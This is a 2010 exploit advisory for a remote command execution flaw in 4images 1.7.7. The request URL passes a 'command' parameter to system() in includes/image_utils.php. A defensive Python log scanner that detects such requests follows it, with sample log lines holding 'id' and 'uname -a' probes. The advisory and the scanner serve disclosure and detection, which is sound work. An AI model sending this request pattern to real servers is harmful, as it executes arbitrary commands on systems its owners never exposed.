4images 1.7.7 Command Execution

2010-05-14T00:00:00
ID PACKETSTORM:89501
Type packetstorm
Reporter Sniper Site Hacker
Modified 2010-05-14T00:00:00

Description

                                        
`
Remote Command Execution Vulnerability  
========================================================================  
  
4images <= 1.7.7 (image_utils.php)  
  
# [+] Author : Sn!pEr.S!Te Hacker #  
# [+] Email : sniper-site@HoTMaiL.coM #  
# [+] T34M Sn!pEr.S!Te Hacker #  
# [+] 12-5-2010 #  
# [+] Script : 4images #  
# [+] Download : http://www.4homepages.de/downloads/e0adbeb40435/4images1.7.7.zip  
# [+] Version : [1.7.7] #  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=  
Exploit : includes/image_utils.php  
  
http://localhost/includes/image_utils.php?command=[your command]  
  
http://127.0.0.1/includes/image_utils.php?command=[your command]  
  
  
system($command);  
  
Lines : 104 and 125  
  
  
My friends : liar - sm Hacker - baby hacker - dmar - mr.Jld - ALhal alsab - adil - Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker - h-ex  
  
`
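
A defender-side check for the request pattern this advisory describes, as an added example (not part of the original advisory or of 4images): it scans web access logs for direct requests to includes/image_utils.php, with or without the `command` parameter. The combined log format, the function name `find_hits` and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [14/May/2010:10:01:02 +0000] "GET /includes/image_utils.php?command=id HTTP/1.1" 200 12 "-" "curl/7.19"
203.0.113.5 - - [14/May/2010:10:01:09 +0000] "GET /gallery//includes/./IMAGE_UTILS.PHP?x=1&command=uname%20-a HTTP/1.1" 200 40 "-" "curl/7.19"
198.51.100.7 - - [14/May/2010:10:02:00 +0000] "GET /details.php?image_id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [14/May/2010:10:03:00 +0000] "GET /includes/image_utils.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
TARGET_SUFFIX = "/includes/image_utils.php"  # path named in the advisory
PARAM = "command"                            # parameter named in the advisory


def find_hits(log_text):
    """Return one dict per request that reaches the include file directly."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_path, _, query = m.group("target").partition("?")
        # Decode and normalise so //, /./ and case variations still match.
        path = posixpath.normpath(unquote(raw_path)).lower()
        if not path.endswith(TARGET_SUFFIX):
            continue
        values = parse_qs(query, keep_blank_values=True).get(PARAM)
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": int(m.group("status")),
            # A library file has no reason to be requested on its own, so a
            # hit without the parameter is still worth reviewing.
            "kind": "command-param" if values is not None else "direct-access",
            "values": values or [],
        })
    return hits


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string, so a value sent in a POST body would show up here as a `direct-access` hit without its parameter.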